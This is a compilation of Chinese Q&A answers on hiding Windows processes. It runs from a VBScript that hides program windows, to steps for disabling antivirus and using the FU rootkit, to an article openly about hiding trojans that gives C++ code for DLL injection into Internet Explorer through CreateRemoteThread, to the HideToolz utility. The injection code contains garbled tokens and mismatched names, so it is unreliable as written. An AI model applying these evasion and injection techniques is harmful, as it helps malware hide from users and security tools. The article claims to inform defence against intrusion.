㈠ 谁有win10隐藏进程软件 或者怎么隐藏
方法一:使用VBScript
1、首先以隐藏系统自带的Win32版《写字板》程序为例,在记事本中写入如下代码: Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wordpad.exe", 0 '后面0的意思是“隐藏” Set WShell = Nothing 注意,代码第三行后的单引号 ' 是VB中的注释符号,其后面的语句没有执行效果。
2、把上述代码保存为.vbs格式,文件名自拟,如下图——
3、此时双击刚刚保存的vbs文件就可以让写字板“隐身”运行,但我们还是可以在任务管理器中找到进程,如下图——
4、如果想隐身运行第三方程序,则需要修改代码,以软媒魔方的清理大师文件为例,代码如下: WShell.Run """" & "D:\Program Files (x86)\Ruanmei\PCMaster\cleanmaster.exe" & """", 0 '如果路径中含有空格,就需要在路径前后加引号和调用符号,格式为"""" & "路径" & """" Set WShell = Nothing
5、按照第2步的方式保存后,双击可以查看效果。需要注意的是,如果程序本身需要管理员权限,而且你的系统开启了UAC,权限请求的窗口是无法隐藏的,如下图——
不过在点击“是”之后就不会看到运行界面和任务栏图标了,只能在任务管理器中找到进程,如下图——
6、如果你想用命令提示符来运行这些vbs,可以采用如下命令格式: wscript "路径\文件名.vbs" 实例: wscript "%userprofile%\Desktop\新建文件夹 (2)\hidewordpad.vbs"
运行效果和双击vbs文件本身是一致的。
㈡ 如何隐藏某个软件的进程
1、下载FU,下载地址: http://clover.by168.com/fu.rar (失效能找的到)
2、关闭杀毒程序后解压缩文件fu.rar。(因为FU是黑客软件,会被杀毒的杀了)
3、解压后可以看见fu下有三个子文件夹,分别是:EXE,fu和Sys
4、进入EXE文件夹,双击运行cmd.exe
5、打开第一个~~~~程序
6、查找程序PID。(分XP和其他系统说明)
XP系统:在刚才运行的cmd.exe黑色输入窗口下输入tasklist,回车。可以看到程序的PID值。
其他系统:打开任务管理器在进程的选项栏下就可以看见程序PID值。开任务管理器的方法是按三键:Ctrl+Alt+Del,注意是三键同时按。还有一种打开任务管理器的方法是右键单击任务栏,然后就有任务管理器这个选项。(由于其他系统无tasklist这个命令,所以输入tasklist会显示tasklist不是内部或外部命令。)
任务管理器-----查看-----选择列------把PID勾选上
7、在cmd.exe的窗口下输入:fu -ph 1180(1180即所查的PID值,你查到什么就是什么啰)
fu和-ph和PID值三者之间都有空格呀!
8、这样程序进程都被屏蔽了。关闭cmd的窗口。可以打开防火墙了
9、可以双开了,再打开一个相同程序没问题了~
说明:fu软件为黑客软件,
杀毒软件可能会认为是木马(因为要隐藏外挂进程,木马一般要隐藏进程的),
请在使用前关闭杀毒软件,然后运行结束后再打开。
我们是经过测试的,如果你信不过我们的提供的fu,
你也可以到官方下载
㈢ Windows NT/系统进程的隐藏技术
摘要 进程的隐藏一直是木马程序设计者不断探求的重要技术,本文采用远程线程技术,通过动态链接库 方法 ,较好地解决了这一 问题 ,通过远程线程将木马作为线程隐藏在其他进程中,从而达到隐藏的目的。
关键字进程 线程 木马 动态链接库
木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。
本文 分析 了Windows NT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现Windows NT/2000系统中进程的隐藏。
1 基本原理
在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在Windows NT/2000中却完全不同, 无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过Windows NT/2000的任务管理器,Windows NT/2000的任务管理器均能轻松显示出木马进程,难道在Windows NT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断 发展 ,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在Windows NT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。
2 实现方法
为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是Dynamic Link Library(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。
运行DLL方法有多种,但其中最隐蔽的.方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。 理论 上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。
远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。
3 实施步骤
1) 用Process32Next()函数找到宿主进程,获取宿主进程ID,并用
OpenProcess()函数打开宿主进程。
2) 用VirtualAllocEx()函数分配远程进程地址空间中的内存。
3) 用WriteProcessMemory()函数将待隐藏的DLL的路径名。
4) 拷贝到步骤二已经分配的内存中。
5) 用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。
6) 用CreateRemoteThread()函数在远程进程中创建一个线程。
7) 它调用正确的LoadlibraryA()函数。
8) 为它传递步骤二中分配的内存地址。
4 具体实例
下面是在C++Builder 4.0环境下编写的运用远程线程技术隐藏木马的程序代码:
#include
#include
#include
#include//该头文件包涵了进程操作的API函数
#pragma hdrstop
#include "Unit1.h"
#pragma package(smart_init)
#pragma resource "*.dfm"
Insisting pszLibFileName;//存放待隐藏的DLL文件名
HANDLE hProcessSnap=NULL;//进程快照句柄
HANDLE hRemoteProcess;//远程进程句柄
LPVOID pszLibFileRemote;//远程进程中分配给文件名的空间
HMODULE phmd;//存放kernel32.dll句柄
HANDLE hRemoteThread1=NULL;//存放远程线程句柄
TForm1 *Form1;
//---------------------------------------------------------
__fast call TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{
}
//---------------------------------------------------------
void __fastcall TForm1::Button1Click(TObject *Sender)
{
PROCESSENTRY32 pe32={0};
DWORD dwRemoteProcessId;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//打开进程快照
if(hProcessSnap==(HANDLE)-1)
{
MessageBox(NULL,"CreateToolhelp32Snapshot failed","",MB_OK);
exit(0);
} //失败返回
pe32.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hProcessSnap,&pe32)) //获取第一个进程
{
do{
AnsiString te;
te=pe32.szExeFile;
if(te.Pos("iexplore.exe")|| te.Pos("IEXPLORE.EXE"))
//找到宿主进程,以IEXPLORE.EXE为例
{ dwRemoteProcessId=pe32.th32ProcessID;
break;
}
}
while(Process32Next(hProcessSnap,&pe32));//获取下一个进程
}
else
{
MessageBox(NULL,"取第一个进程失败","",MB_OK);
exit(0);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM
_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
//打开远程进程
pszLibFileName=GetCurrentDir()+""+"hide.dll";
// 假设hide.dll是待隐藏的进程
int cb=(1+pszLibFileName.Length())*sizeof(char);// 计算 dll文件名长度
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,
MEM_COMMIT,PAGE_READWRITE);
//申请存放文件名的空间
BOOL ReturnCode=WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);
//把dll文件名写入申请的空间
phmd=GetMoleHandle("kernel32.dll");
LPTHREAD_START_ROUTINE fnStartAddr=(LPTHREAD_START_ROUTINE)
GetProcAddress(phmd,"LoadLibraryA");
//获取动态链接库函数地址
hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,
pfnStartAddr,pszLibFileRemote,0,NULL);
//创建远程线程
if(hRemoteThread1!=NULL)
CloseHandle(hRemoteThread1);//关闭远程线程
if(hProcessSnap!=NULL)
CloseHandle(hProcessSnap);//关闭进程快照
}
该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。
至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:
#include
#include
#pragma hdrstop
#pragma argsused
BOOL WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved)
{
char szProcessId[64];
switch(reason)
{
case DLL_PROCESS_ATTACH:
{//获取当前进程ID
itoa(GetCurrentProcessId(),szProcessId,10);
MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);
break;
}
default:
}
return TRUE;
}
当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具
也能看到:
Process ID: 1208
C:WINNTIEXPLORE.EXE (0x00400000)
……
C:WINNThide.dll (0x100000000)
……
这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。
5 结束语
进程隐藏技术和 方法 有很多,而且这一技术 发展 也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供 参考 ,本文抛砖引玉,不当之处诚恳批评指正。
参考 文献
1 Jeffrey Richter着 王建华、张焕生、侯丽坤等译 Windows核心编程 机械 工业 出版社2
K.赖斯多夫 H. 亨德森着 希望图书创作室译 Borland C++ Builder 实用培训教程.
㈣ 怎么隐藏进程
步骤/方法
在网络上面搜索HideToolz ,打开第一个搜索结果,点击进入下载。把HideToolz 下载到你的电脑里面。
鼠标双击打开该压缩包,再直接双击该软件即可打开该软件了。并且在软件里面可以看见目前的进程数为多少个。
按Ctrl + Alt + . 【启动任务管理器】,在 HideToolz 里面找到你想要隐藏的运行程序,鼠标单击右键——选择隐藏,然后在任务管理器里面就很清楚的看见你想隐藏的运行程序已经不见了。
既然隐藏了运行程序,那么想显示出来了又该怎么办呢?在 HideToolz 里面找到你已经隐藏了的运行程序,鼠标单击右键——选择显示即可。
当然,运行 HideToolz 的时候最好也把 HideToolz 的托盘图标也隐藏了。
图解教程:http://jingyan..com/article/75ab0bcb17c66cd6874db278.html
注意事项
HideToolz 下载方式如下图所示:
除了第三方软件可以隐藏进程,还有使用其他的方法也可以隐藏进程,不过相比较第三方软件去隐藏进程的步骤要复杂些。